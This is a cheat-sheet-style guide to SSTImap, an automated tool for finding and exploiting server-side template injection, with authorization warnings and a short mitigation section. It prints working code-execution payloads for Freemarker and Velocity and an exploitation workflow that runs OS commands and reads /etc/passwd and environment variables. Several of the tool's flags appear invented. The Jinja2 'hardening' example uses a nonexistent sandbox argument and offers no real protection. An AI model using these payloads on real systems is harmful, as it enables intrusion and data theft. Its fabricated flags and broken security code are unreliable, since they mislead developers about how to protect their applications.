SSTImap
Overview
Sección titulada «Overview»SSTImap is an automated security testing tool for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. It identifies template engines and attempts code execution to demonstrate impact of SSTI vulnerabilities.
Key Features
Sección titulada «Key Features»- Automatic template engine detection
- SSTI vulnerability scanning
- Blind and non-blind exploitation
- Multi-payload testing
- Code execution capabilities
- Request/response analysis
- Vulnerability reporting
- Cross-platform support
Important Notice
Sección titulada «Important Notice»WARNING: SSTImap should ONLY be used:
- In authorized penetration testing
- With explicit written permission
- On systems you own or control
- In security research environments
- For vulnerability assessment
Unauthorized testing is illegal and unethical.
Use Cases (Authorized)
Sección titulada «Use Cases (Authorized)»- Identify SSTI vulnerabilities in web applications
- Test template engine security configurations
- Verify vulnerability remediation
- Security research and education
- Penetration testing with authorization
- Code execution impact demonstration
Installation
Sección titulada «Installation»From GitHub
Sección titulada «From GitHub»git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
chmod +x sstimap.pyPython Requirements
Sección titulada «Python Requirements»# Install dependencies
pip install requests
# Or with requirements file
pip install -r requirements.txtVerify Installation
Sección titulada «Verify Installation»python sstimap.py -hDocker Installation
Sección titulada «Docker Installation»docker pull sstimap:latest
docker run -it sstimap:latest -hBasic Concepts
Sección titulada «Basic Concepts»What is SSTI?
Sección titulada «What is SSTI?»Server-Side Template Injection occurs when:
- User input is embedded in template files
- Templates are evaluated server-side
- Insufficient input sanitization exists
- Attacker can inject template directives
Common Vulnerable Templates
Sección titulada «Common Vulnerable Templates»| Engine | Language | Usage |
|---|---|---|
| Jinja2 | Python | Flask, Django |
| Twig | PHP | Symfony |
| Freemarker | Java | Spring Boot |
| Velocity | Java | Various frameworks |
| Thymeleaf | Java | Spring |
| ERB | Ruby | Rails |
| Jade/Pug | Node.js | Express |
| EJS | Node.js | Express |
Attack Payload Examples
Sección titulada «Attack Payload Examples»Jinja2: {{7*7}}
Twig: {{7*7}}
Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity: #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))$rt.getRuntime().exec('command')Installation and Setup
Sección titulada «Installation and Setup»Full Installation
Sección titulada «Full Installation»# Clone repository
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x sstimap.py
# Run help
./sstimap.py -hAlternative: Python Package
Sección titulada «Alternative: Python Package»pip install sstimap
sstimap.py -hBasic Usage
Sección titulada «Basic Usage»Simple Vulnerability Scan
Sección titulada «Simple Vulnerability Scan»# Scan single URL
python sstimap.py -u "http://vulnerable-site.com/page?name=test"
# Output:
# [*] Testing server-side template injection
# [+] Jinja2 detected in: name parameter
# [+] Vulnerability confirmedScan with Custom Payload Parameter
Sección titulada «Scan with Custom Payload Parameter»# Test specific parameter
python sstimap.py -u "http://example.com/test?input=PAYLOAD" \
--test-parameter "input"Output to File
Sección titulada «Output to File»# Save results to file
python sstimap.py -u "http://example.com/?name=test" \
-o results.txtVerbose Output
Sección titulada «Verbose Output»# Enable verbose mode for detailed information
python sstimap.py -u "http://example.com/?name=test" \
-vAdvanced Scanning
Sección titulada «Advanced Scanning»Template Engine Detection
Sección titulada «Template Engine Detection»# Detect template engine without exploitation
python sstimap.py -u "http://vulnerable-app.com/?search=test" \
--detect-only
# Output shows:
# [+] Template engine: Jinja2
# [+] Injection point: search parameterTest All Parameters
Sección titulada «Test All Parameters»# Automatically test all GET/POST parameters
python sstimap.py -u "http://example.com/?id=1&name=test&type=prod" \
--test-all-paramsBlind SSTI Detection
Sección titulada «Blind SSTI Detection»# Test for blind SSTI (time-based)
python sstimap.py -u "http://example.com/?input=test" \
--detect-blind
# Introduces delays to detect processingCustom Timeout
Sección titulada «Custom Timeout»# Set custom timeout for responses
python sstimap.py -u "http://example.com/?id=test" \
--timeout 10Exploitation Techniques
Sección titulada «Exploitation Techniques»Basic Code Execution
Sección titulada «Basic Code Execution»# Test basic math to confirm SSTI
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD" \
--test-expression "7*7"
# Result should show: 49Command Execution
Sección titulada «Command Execution»# Execute OS command
python sstimap.py -u "http://example.com/?input=PAYLOAD" \
--execute-command "id"
# Attempts: whoami, id, cat /etc/passwd, etc.File Reading
Sección titulada «File Reading»# Read server files
python sstimap.py -u "http://example.com/?file=PAYLOAD" \
--read-file "/etc/passwd"
# Or guess common file paths
python sstimap.py -u "http://example.com/?page=PAYLOAD" \
--read-filesDatabase Interaction
Sección titulada «Database Interaction»# Attempt database access via template injection
python sstimap.py -u "http://vulnerable-app.com/?search=PAYLOAD" \
--databaseRequest Configuration
Sección titulada «Request Configuration»Custom Headers
Sección titulada «Custom Headers»# Add authentication headers
python sstimap.py -u "http://example.com/?id=test" \
-H "Authorization: Bearer TOKEN" \
-H "User-Agent: Custom-Agent"POST Data
Sección titulada «POST Data»# Test POST parameters
python sstimap.py -u "http://example.com/login" \
--data "username=admin&password=test" \
--test-parameter "password"Cookies
Sección titulada «Cookies»# Include session cookies
python sstimap.py -u "http://example.com/?name=test" \
--cookie "PHPSESSID=abcd1234; admin=false"Proxy Configuration
Sección titulada «Proxy Configuration»# Route through proxy
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080"
# For Burp Suite
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080" \
--ignore-proxy-warningsSSL Verification
Sección titulada «SSL Verification»# Ignore SSL warnings (test environments)
python sstimap.py -u "https://example.com/?input=test" \
--no-ssl-verifyTemplate Engine Specific Payloads
Sección titulada «Template Engine Specific Payloads»Jinja2 (Python)
Sección titulada «Jinja2 (Python)»# Test Jinja2
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payloads tested:
# {{7*7}} -> 49
# {{config.items()}}
# {{request.environ}}Twig (PHP)
Sección titulada «Twig (PHP)»# Twig injection test
python sstimap.py -u "http://vulnerable.com/?search=PAYLOAD"
# Payloads:
# {{7*7}} -> 49
# {{_self}}
# {{this.env}}Freemarker (Java)
Sección titulada «Freemarker (Java)»# Freemarker payload
python sstimap.py -u "http://vulnerable.com/?input=PAYLOAD"
# Freemarker RCE payload
# <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}Velocity (Java)
Sección titulada «Velocity (Java)»# Velocity injection
python sstimap.py -u "http://vulnerable.com/?id=PAYLOAD"
# Math expression: #set($x=7*7)$xThymeleaf (Java)
Sección titulada «Thymeleaf (Java)»# Thymeleaf template injection
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payload: [[${7*7}]]Automation and Batch Testing
Sección titulada «Automation and Batch Testing»Scan Multiple URLs
Sección titulada «Scan Multiple URLs»# Test multiple endpoints
cat urls.txt | while read url; do
python sstimap.py -u "$url" -o results_$(date +%s).txt
doneBulk Parameter Testing
Sección titulada «Bulk Parameter Testing»#!/bin/bash
# Test all parameters in URL list
while read url; do
echo "Testing: $url"
python sstimap.py -u "$url" \
--test-all-params \
-o results.txt
done < urls.txtAutomated Reporting
Sección titulada «Automated Reporting»#!/bin/bash
# Generate report of findings
TARGET="http://vulnerable-app.com"
REPORT="ssti_report_$(date +%Y%m%d).txt"
echo "SSTI Vulnerability Assessment Report" > $REPORT
echo "Date: $(date)" >> $REPORT
echo "Target: $TARGET" >> $REPORT
echo "================================" >> $REPORT
# Test all discovered endpoints
python sstimap.py -u "$TARGET" \
--test-all-params \
-v >> $REPORT
echo "Report saved to: $REPORT"Output Analysis
Sección titulada «Output Analysis»Understanding Output
Sección titulada «Understanding Output»[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)Parse Results Script
Sección titulada «Parse Results Script»#!/bin/bash
# Extract vulnerable endpoints
python sstimap.py -u "http://target.com/?id=test" \
--test-all-params -v 2>&1 | \
grep -E "\[+\]|VULNERABLE" | \
tee vulnerabilities.logExploitation Workflow
Sección titulada «Exploitation Workflow»Step 1: Reconnaissance
Sección titulada «Step 1: Reconnaissance»# Map application parameters
python sstimap.py -u "http://target.com/?search=test&category=1" \
--detect-onlyStep 2: Template Detection
Sección titulada «Step 2: Template Detection»# Identify template engine
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--detect-template-engineStep 3: Vulnerability Confirmation
Sección titulada «Step 3: Vulnerability Confirmation»# Confirm SSTI vulnerability
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--test-expression "7*7"Step 4: Code Execution
Sección titulada «Step 4: Code Execution»# Execute commands
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--execute-command "id"Step 5: Post-Exploitation
Sección titulada «Step 5: Post-Exploitation»# Read sensitive files
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-file "/etc/passwd"
# Access environment variables
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-envIntegration with Other Tools
Sección titulada «Integration with Other Tools»Burp Suite Integration
Sección titulada «Burp Suite Integration»# Use SSTImap through Burp proxy
python sstimap.py -u "http://example.com/?param=test" \
--proxy "http://127.0.0.1:8080"
# Intercept and modify requests in Burp
# Then test with SSTImapOWASP ZAP Integration
Sección titulada «OWASP ZAP Integration»# Export ZAP findings and test with SSTImap
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8090"Metasploit Integration
Sección titulada «Metasploit Integration»# Use findings from SSTImap in Metasploit
# 1. Run SSTImap to identify SSTI
# 2. Use template-specific exploits in Metasploit
# 3. Gain shell access via template injectionPrevention and Mitigation
Sección titulada «Prevention and Mitigation»Secure Coding Practices
Sección titulada «Secure Coding Practices»1. Input Validation
- Whitelist allowed characters
- Reject suspicious patterns
- Length restrictions
2. Template Sandboxing
- Use restricted templates
- Disable dangerous functions
- Limit object access
3. Context Separation
- Don't mix code with templates
- Use template escaping
- Separate logic from presentation
4. Security Configuration
- Disable debug mode in production
- Restrict file access
- Limit available functionsJinja2 Hardening Example
Sección titulada «Jinja2 Hardening Example»from jinja2 import Environment, select_autoescape
# Create restricted environment
env = Environment(
autoescape=select_autoescape(['html', 'xml']),
sandbox=True # Enable sandbox
)
# Disable dangerous filters
env.filters['unsafe'] = lambda x: x # Don't use!
# Render safely
template = env.from_string(user_input)
result = template.render(safe_var=value)Detection Patterns
Sección titulada «Detection Patterns»Suspicious patterns to monitor:
- {{7*7}} responses as 49
- {%.*%} in requests
- Object access attempts
- File read attempts
- OS command patternsTroubleshooting
Sección titulada «Troubleshooting»Tool Not Finding Vulnerabilities
Sección titulada «Tool Not Finding Vulnerabilities»Issue: SSTI exists but SSTImap doesn’t detect it.
Solution:
# Try manual testing
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
-v
# Test with custom payload
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
--payload "{{7*7}}"
# Different parameter
python sstimap.py -u "http://example.com/?name=PAYLOAD" \
--test-parameter "name"Connection Issues
Sección titulada «Connection Issues»Issue: Unable to connect to target.
Solution:
# Test connectivity
curl http://target.com/?id=test
# Try with verbose
python sstimap.py -u "http://target.com/?id=test" \
-v
# Use proxy if needed
python sstimap.py -u "http://target.com/?id=test" \
--proxy "http://127.0.0.1:8080"False Positives
Sección titulada «False Positives»Issue: Tool reports vulnerabilities that don’t exist.
Solution:
# Verify manually
# 1. Submit test payload: {{7*7}}
# 2. Check if response shows: 49
# 3. Confirm with different payloads
# Test with blind detection
python sstimap.py -u "http://target.com/?id=test" \
--detect-blindSecurity Considerations
Sección titulada «Security Considerations»Authorized Testing Only
Sección titulada «Authorized Testing Only»Before testing:
✓ Obtain written authorization
✓ Define scope clearly
✓ Document test plan
✓ Get legal review
✓ Maintain confidentialityData Protection
Sección titulada «Data Protection»# Encrypt sensitive findings
gpg -e -r recipient@company.com report.txt
# Secure deletion
shred -vfz report.txt
# Audit trail
echo "$(date): SSTI testing completed" >> audit.logReferences
Sección titulada «References»- GitHub: vladimirmitin/sstimap
- OWASP: Server-Side Template Injection
- PortSwigger: SSTI Tutorial
- CVE Database: Search SSTI vulnerabilities
Quick Reference
Sección titulada «Quick Reference»# Basic scan
python sstimap.py -u "http://vulnerable.com/?id=test"
# Detect template engine
python sstimap.py -u "http://vulnerable.com/?id=test" --detect-only
# Execute command
python sstimap.py -u "http://vulnerable.com/?id=test" --execute-command "id"
# Read file
python sstimap.py -u "http://vulnerable.com/?id=test" --read-file "/etc/passwd"
# Test all parameters
python sstimap.py -u "http://vulnerable.com/?a=1&b=2&c=3" --test-all-params
# Verbose output
python sstimap.py -u "http://vulnerable.com/?id=test" -v
# Save results
python sstimap.py -u "http://vulnerable.com/?id=test" -o results.txt
# With proxy
python sstimap.py -u "http://vulnerable.com/?id=test" --proxy "http://127.0.0.1:8080"
# Custom headers
python sstimap.py -u "http://vulnerable.com/?id=test" \
-H "Authorization: Bearer TOKEN"